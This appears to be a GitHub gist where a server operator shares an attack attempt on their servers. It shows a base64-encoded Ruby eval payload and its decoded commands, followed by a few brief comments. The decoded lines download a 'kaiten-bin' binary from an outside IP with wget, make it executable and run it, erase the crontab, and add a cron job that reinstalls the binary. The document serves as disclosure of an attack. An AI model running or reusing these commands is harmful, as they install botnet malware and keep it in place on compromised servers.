What this Ukraine hacker was trying to run on our servers.
| # Wanted to eval this | |
| %[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0] | |
| # Which would run this | |
| system("wget -O /var/tmp/k 188.190.124.120/kaiten-bin") | |
| system("chmod +x /var/tmp/k") | |
| system("/var/tmp/k") | |
| system('crontab -r') | |
| system('(crontab -l ; echo \"* 1 * * * wget -O /var/tmp/k 188.190.124.120/kaiten-bin && chmod +x /var/tmp/k && /var/tmp/k\") | crontab -') |
This comment has been minimized.
This comment has been minimized.
|
Yeah, sadness ensued. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
uxp commentedMay 23, 2013
aw, 404.